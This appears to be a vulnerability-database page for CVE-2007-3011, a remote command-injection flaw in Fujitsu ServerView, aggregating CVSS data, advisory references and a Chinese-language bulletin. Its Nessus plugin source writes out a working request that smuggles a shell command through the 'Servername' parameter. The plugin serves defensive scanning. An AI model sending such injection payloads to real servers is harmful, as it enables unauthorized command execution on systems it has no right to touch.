Vulnerabilities > CVE-2007-3011 - Remote Command Execution vulnerability in Fujitsu ServerView DBASCIIAccess

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
fujitsu
nessus
exploit available
NVD
Published: 2007-07-05
Updated: 2018-10-16

Summary

The DBAsciiAccess CGI Script in the web interface in Fujitsu-Siemens Computers ServerView before 4.50.09 allows remote attackers to execute arbitrary commands via shell metacharacters in the Servername subparameter of the ParameterList parameter.

Vulnerable Configurations

Part Description Count
Application
Fujitsu
33

Exploit-Db

descriptionFujitsu ServerView 4.50.8 DBASCIIAccess Remote Command Execution Vulnerability. CVE-2007-3011. Remote exploits for multiple platform
idEDB-ID:30264
last seen2016-02-03
modified2007-07-03
published2007-07-03
reporterRedTeam Pentesting GmbH
sourcehttps://www.exploit-db.com/download/30264/
titleFujitsu ServerView <= 4.50.8 DBASCIIAccess Remote Command Execution Vulnerability

Nessus

NASL familyCGI abuses
NASL idSERVERVIEW_SERVERNAME_CMD_EXEC.NASL
descriptionThe remote host is running ServerView, a web-based suite of asset management tools. The version of ServerView installed on the remote host fails to sanitize user-supplied input to the
last seen2020-06-01
modified2020-06-02
plugin id25672
published2007-07-06
reporterThis script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/25672
titleServerView Servername Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(25672);
  script_version("1.14");

  script_cve_id("CVE-2007-3011");
  script_bugtraq_id(24762);

  script_name(english:"ServerView Servername Parameter Arbitrary Command Execution");
  script_summary(english:"Tries to run a command via ServerView's SnmpListMibValues script");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that allows arbitrary
command execution." );
 script_set_attribute(attribute:"description", value:
"The remote host is running ServerView, a web-based suite of asset
management tools. 

The version of ServerView installed on the remote host fails to
sanitize user-supplied input to the 'Servername' parameter of the
'SnmpView/SnmpListMibValues' script before using it to execute a shell
command.  An unauthenticated attacker can leverage this issue to
execute arbitrary code on the remote host subject to the privileges of
the web server user id. 

Note that the same result can be achieved via input to the
'ServerName' subparameter of the 'Parameterlist' parameter of the
'DBAsciiAccess' script." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/472800/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to ServerView version 4.50.09 as that reportedly fixes the
issue." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/07/06");
 script_set_attribute(attribute:"vuln_publication_date", value: "2007/07/05");
 script_cvs_date("Date: 2018/11/15 20:50:18");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:fujitsu:serverview");
 script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

# Try to exploit the issue to run a command.
cmd = "id";
exploit = string(
  "SSL=&",
  "Server=", get_host_ip(), "&",
  "ThisApplication=TestConnectivityFirst&",
  "ServerName=bcmes&",
  "Servername=127.0.0.1;", cmd, ";,SType--Server&",
  "ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1"
);

http_check_remote_code(
  check_request : string("/ServerView/SnmpView/SnmpListMibValues?", exploit),
  check_result  : "uid=[0-9]+.*gid=[0-9]+.*",
  command       : cmd,
  port          : port
);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/57499/fujitsu-serverview-exec.txt
idPACKETSTORM:57499
last seen2016-12-05
published2007-07-07
reporterredteam-pentesting.de
sourcehttps://packetstormsecurity.com/files/57499/fujitsu-serverview-exec.txt.html
titlefujitsu-serverview-exec.txt

Seebug

bulletinFamilyexploit
descriptionBUGTRAQ ID: 24762 CVE(CAN) ID: CVE-2007-3011 ServerView是用于进行自动分析和版本维护的资产管理工具。 ServerView的Web接口处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程的权限执行任意命令。 DBAsciiAccess CGI脚本提供了ping功能,该脚本Parameterlist参数的Servername子参数给出了所要ping的IP地址,但没有对这个IP地址执行任何检查。如果在IP后添加了拖尾分号,攻击者就可以注入任意shell命令并以Web服务器进程的权限执行。 Fujitsu ServerView &lt; 4.50.09 临时解决方法: * 禁止不可信任用户访问ServerView的Web接口。 厂商补丁: Fujitsu ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: <a href="http://support.fujitsu-siemens.com/Download/ShowDescription.asp?SoftwareGUID=D1ED76B7-FB37-4375-8744-8E6D5CFDC87F" target="_blank">http://support.fujitsu-siemens.com/Download/ShowDescription.asp?SoftwareGUID=D1ED76B7-FB37-4375-8744-8E6D5CFDC87F</a>
idSSV:1970
last seen2017-11-19
modified2007-07-05
published2007-07-05
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-1970
titleFujitsu ServerView DBASCIIAccess脚本远程代码执行漏洞

References